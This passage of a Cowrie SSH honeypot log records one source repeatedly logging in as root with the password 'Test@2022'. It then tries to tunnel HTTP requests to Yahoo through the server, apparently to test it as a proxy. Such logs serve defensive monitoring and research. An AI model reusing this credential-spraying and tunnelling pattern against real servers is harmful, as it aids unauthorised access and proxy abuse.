-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:15.833982Z","src_ip":"213.209.150.239","session":"ac76c157b1e6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:16.116270Z","src_ip":"213.209.150.239","session":"ac76c157b1e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":32321,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:32321","sensor":"my-vps","timestamp":"2025-08-26T01:05:16.173536Z","session":"ac76c157b1e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:16.230139Z","src_ip":"213.209.150.239","session":"ac76c157b1e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":27690,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:27690","sensor":"my-vps","timestamp":"2025-08-26T01:05:16.382897Z","session":"ac76c157b1e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:16.439438Z","src_ip":"213.209.150.239","session":"ac76c157b1e6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:16.496584Z","src_ip":"213.209.150.239","session":"ac76c157b1e6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35552,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b178490fb94","protocol":"ssh","message":"New connection: 213.209.150.239:35552 (1.2.3.4:22) [session: 8b178490fb94]","sensor":"my-vps","timestamp":"2025-08-26T01:05:16.542965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:16.543614Z","src_ip":"213.209.150.239","session":"8b178490fb94"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:16.590886Z","src_ip":"213.209.150.239","session":"8b178490fb94"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:16.825969Z","src_ip":"213.209.150.239","session":"8b178490fb94"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":27226,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:27226","sensor":"my-vps","timestamp":"2025-08-26T01:05:16.874318Z","session":"8b178490fb94"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:16.922116Z","src_ip":"213.209.150.239","session":"8b178490fb94"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":24441,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:24441","sensor":"my-vps","timestamp":"2025-08-26T01:05:17.057506Z","session":"8b178490fb94"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:17.104794Z","src_ip":"213.209.150.239","session":"8b178490fb94"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:17.152797Z","src_ip":"213.209.150.239","session":"8b178490fb94"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35604,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbf38349b5d9","protocol":"ssh","message":"New connection: 213.209.150.239:35604 (1.2.3.4:22) [session: bbf38349b5d9]","sensor":"my-vps","timestamp":"2025-08-26T01:05:17.208405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:17.209310Z","src_ip":"213.209.150.239","session":"bbf38349b5d9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:17.266028Z","src_ip":"213.209.150.239","session":"bbf38349b5d9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:17.547734Z","src_ip":"213.209.150.239","session":"bbf38349b5d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":28386,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:28386","sensor":"my-vps","timestamp":"2025-08-26T01:05:17.605054Z","session":"bbf38349b5d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:17.661693Z","src_ip":"213.209.150.239","session":"bbf38349b5d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":14801,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14801","sensor":"my-vps","timestamp":"2025-08-26T01:05:17.815101Z","session":"bbf38349b5d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:17.872340Z","src_ip":"213.209.150.239","session":"bbf38349b5d9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:17.929725Z","src_ip":"213.209.150.239","session":"bbf38349b5d9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35663,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0c5ea142396","protocol":"ssh","message":"New connection: 213.209.150.239:35663 (1.2.3.4:22) [session: f0c5ea142396]","sensor":"my-vps","timestamp":"2025-08-26T01:05:17.985312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:17.985974Z","src_ip":"213.209.150.239","session":"f0c5ea142396"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:18.042676Z","src_ip":"213.209.150.239","session":"f0c5ea142396"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:18.324641Z","src_ip":"213.209.150.239","session":"f0c5ea142396"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":1838,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:1838","sensor":"my-vps","timestamp":"2025-08-26T01:05:18.382182Z","session":"f0c5ea142396"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:18.439139Z","src_ip":"213.209.150.239","session":"f0c5ea142396"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":28259,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28259","sensor":"my-vps","timestamp":"2025-08-26T01:05:18.595357Z","session":"f0c5ea142396"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:18.652023Z","src_ip":"213.209.150.239","session":"f0c5ea142396"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:18.709280Z","src_ip":"213.209.150.239","session":"f0c5ea142396"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35720,"dst_ip":"1.2.3.4","dst_port":22,"session":"9129cfd80883","protocol":"ssh","message":"New connection: 213.209.150.239:35720 (1.2.3.4:22) [session: 9129cfd80883]","sensor":"my-vps","timestamp":"2025-08-26T01:05:18.755605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:18.756545Z","src_ip":"213.209.150.239","session":"9129cfd80883"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:18.803732Z","src_ip":"213.209.150.239","session":"9129cfd80883"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:19.038909Z","src_ip":"213.209.150.239","session":"9129cfd80883"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":17944,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:17944","sensor":"my-vps","timestamp":"2025-08-26T01:05:19.087695Z","session":"9129cfd80883"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:19.135123Z","src_ip":"213.209.150.239","session":"9129cfd80883"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":24032,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:24032","sensor":"my-vps","timestamp":"2025-08-26T01:05:19.269564Z","session":"9129cfd80883"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:19.316743Z","src_ip":"213.209.150.239","session":"9129cfd80883"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:19.364890Z","src_ip":"213.209.150.239","session":"9129cfd80883"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35760,"dst_ip":"1.2.3.4","dst_port":22,"session":"876b9eedb817","protocol":"ssh","message":"New connection: 213.209.150.239:35760 (1.2.3.4:22) [session: 876b9eedb817]","sensor":"my-vps","timestamp":"2025-08-26T01:05:19.420716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:19.421964Z","src_ip":"213.209.150.239","session":"876b9eedb817"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:19.478573Z","src_ip":"213.209.150.239","session":"876b9eedb817"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:19.760653Z","src_ip":"213.209.150.239","session":"876b9eedb817"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":522,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:522","sensor":"my-vps","timestamp":"2025-08-26T01:05:19.818434Z","session":"876b9eedb817"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:19.875437Z","src_ip":"213.209.150.239","session":"876b9eedb817"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":819,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:819","sensor":"my-vps","timestamp":"2025-08-26T01:05:20.031028Z","session":"876b9eedb817"}
